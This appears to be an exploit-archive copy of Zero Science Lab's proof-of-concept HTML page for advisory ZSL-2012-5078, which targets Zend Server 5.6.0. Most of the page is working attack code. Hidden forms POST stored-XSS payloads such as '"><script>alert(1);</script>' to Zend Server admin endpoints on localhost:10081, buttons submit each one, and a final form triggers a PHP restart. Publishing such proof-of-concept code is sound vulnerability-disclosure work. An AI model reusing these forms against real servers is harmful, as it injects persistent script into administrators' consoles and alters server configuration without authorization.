Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities

2012-03-12 11:15:04

<html><title>Download</title><link
rel="Shortcut Icon" href="http://zeroscience.mk/favicon.ico" type="image/x-icon"><body
bgcolor="#1C1C1C"><br
/> <img
style="margin-left:10" src="http://zeroscience.mk/images/zsl-logo1.png" hight="20%" width="20%"> <script type="text/javascript">var disclaimer = "This document and all the information it contains are provided \"as is\",\n" +
"for educational purposes only, without warranty of any kind, whether\n" +
"express or implied.\n\n" +
"The author reserves the right not to be responsible for the topicality,\n" +
"correctness, completeness or quality of the information provided in\n" +
"this document. Liability claims regarding damage caused by the use of\n" +
"any information provided, including any kind of information which is\n" +
"incomplete or incorrect, will therefore be rejected.";
var answ = confirm(disclaimer);
if (answ == true){}else{window.location.href = "http://www.zend.com";}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
function xss6(){document.forms["xss6"].submit();}
function xss7(){document.forms["xss7"].submit();}
function rst(){document.forms["rst"].submit();}</script> <center><h2 style="position:absolute;left:525;top:32;background-color:#BAB8B9;width:200"> HTML Response:</h2></center> <iframe
src="http://www.zeroscience.mk/codes/zend_s03.txt" width="1100" height="700"
name="ZSL_iframe" align="top" frameborder="0" style="position:absolute;left:525;
top:80;background-color:#cecece;"></iframe> <font
color="#414141" size="2" style="position:absolute;top:795px;right:55px">v0.3</font> <br
/><form
action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBPcHRpbWl6ZXIr"
enctype="application/x-www-form-urlencoded" method="POST" id="xss1" target="ZSL_iframe"> <input
type="hidden" name="trgtAction" value="Search" /> <input
type="hidden" name="searchName" value='ext:Zend Optimizer+' /> <input
type="hidden" name='directives[zend_optimizerplus.blacklist_filename]' value='"><script>alert(1);</script>' /></form><form
action="http://localhost:10081/ZendServer/Code-Tracing/Generate-Dump"
enctype="application/x-www-form-urlencoded" method="POST" id="xss2" target="ZSL_iframe"> <input
type="hidden" name="traceUrl" value='"><script>alert("ZSL");</script>' /></form><form
action="http://localhost:10081/ZendServer/Page-Cache/Save-Rule"
enctype="application/x-www-form-urlencoded" method="POST" id="xss3" target="ZSL_iframe"> <input
type="hidden" name="compression" value="1" /> <input
type="hidden" name="host" value='"><script>alert(1);</script>' /> <input
type="hidden" name="lifetime" value="11" /> <input
type="hidden" name="matchConditions" value="ALL" /> <input
type="hidden" name="name" value='"><script>alert(2);</script>' /> <input
type="hidden" name="path" value='"><script>alert(3);</script>' /> <input
type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionMatch]' value="1" /> <input
type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionType]' value="equals" /> <input
type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionValue]' value="1" /> <input
type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionVar]' value="_GET" /> <input
type="hidden" name="schema" value="http" /> <input
type="hidden" name="type" value="exact" /></form><form
action="http://localhost:10081/ZendServer/Job-Queue-Scheduling/Save-Rule"
enctype="application/x-www-form-urlencoded" method="POST" id="xss4" target="ZSL_iframe"> <input
type="hidden" name="ruleId" value="" /> <input
type="hidden" name="ruleName" value='"><script>alert("ZSL");</script>' /> <input
type="hidden" name="ruleUrl" value="http://www.zeroscience.mk" /> <input
type="hidden" name="scheduleDailyTime" value="" /> <input
type="hidden" name="scheduleEvery" value="schedule-every-hours" /> <input
type="hidden" name="scheduleEveryHours" value="1" /> <input
type="hidden" name="scheduleEveryMinutes" value="" /> <input
type="hidden" name="scheduleHourlyMinute" value="" /> <input
type="hidden" name="scheduleMonthlyDay" value="" /> <input
type="hidden" name="scheduleMonthlyTime" value="" /> <input
type="hidden" name="scheduleType" value="schedule-every" /> <input
type="hidden" name="scheduleWeeklyTime" value="" /></form><form
action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBKYXZhIEJyaWRnZQ%3D%3D"
enctype="application/x-www-form-urlencoded" method="POST" id="xss5" target="ZSL_iframe"> <input
type="hidden" name="trgtAction" value="Search" /> <input
type="hidden" name="searchName" value='ext:Zend Java Bridge' /> <input
type="hidden" name="directives[zend_jbridge.encoding]" value='"><script>alert(1);</script>' /></form><form
action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBEZWJ1Z2dlcg%3D%3D"
enctype="application/x-www-form-urlencoded" method="POST" id="xss6" target="ZSL_iframe"> <input
type="hidden" name="trgtAction" value="Search" /> <input
type="hidden" name="searchName" value='ext:Zend Debugger' /> <input
type="hidden" name="directives[zend_debugger.allow_hosts]" value='"><script>alert(1);</script>' /> <input
type="hidden" name="directives[zend_debugger.deny_hosts]" value='"><script>alert(2);</script>' /></form><form
action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBPcHRpbWl6ZXIr"
enctype="application/x-www-form-urlencoded" method="POST" id="xss7" target="ZSL_iframe"> <input
type="hidden" name="trgtAction" value="Search" /> <input
type="hidden" name="searchName" value='ext:Zend Code Tracing' /> <input
type="hidden" name='directives[zend_codetracing.log_file]' value='"><script>alert(1);</script>' /></form><form
action="http://localhost:10081/ZendServer/Configuration/Webserver-Restart"
enctype="application/x-www-form-urlencoded" method="POST" id="rst" target="ZSL_iframe"> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="1. XSS POST Injection --> 'directives[zend_optimizerplus.blacklist_filename]'" onClick="xss1()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="2. XSS POST Injection --> 'traceUrl'" onClick="xss2()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="3. XSS POST Injection --> 'host', 'name', 'path'" onClick="xss3()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="4. XSS POST Injection --> 'ruleName'" onClick="xss4()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="5. XSS POST Injection --> 'directives[zend_jbridge.encoding]'" onClick="xss5()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="6. XSS POST Injection --> 'directives[zend_debugger.allow_hosts]'" onClick="xss6()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="7. XSS POST Injection --> 'directives[zend_codetracing.log_file]'" onClick="xss7()" /> <br
/><br
/><br
/><br
/> <input
type="button"
style="color:white;background-color:#c05c5c;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:5;padding-bottom:5;margin-left:10"
value="8. Restart PHP" onClick="rst()" /> <br
/><br
/> <br
/><br
/> <font
color="gray" size="2" style="margin-left:10">© 2012. <a
href="http://www.zeroscience.mk"
target="_blank" style="text-decoration:none"><font
color="gray">Zero Science Lab</font></a><br
/> <font
style="margin-left:10">Macedonian Information Security Research And Development Laboratory</font> <br
/><font
style="margin-left:10"> Proof of Concept (PoC) code for advisory ID: <a
href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5078.php" target="ZSL_iframe"
style="text-decoration:none"><font
color="gray">ZSL-2012-5078</font></a></font></body></html>
<!-- Dynamic page generated in 0.160 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2012-03-12 10:09:25 -->

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.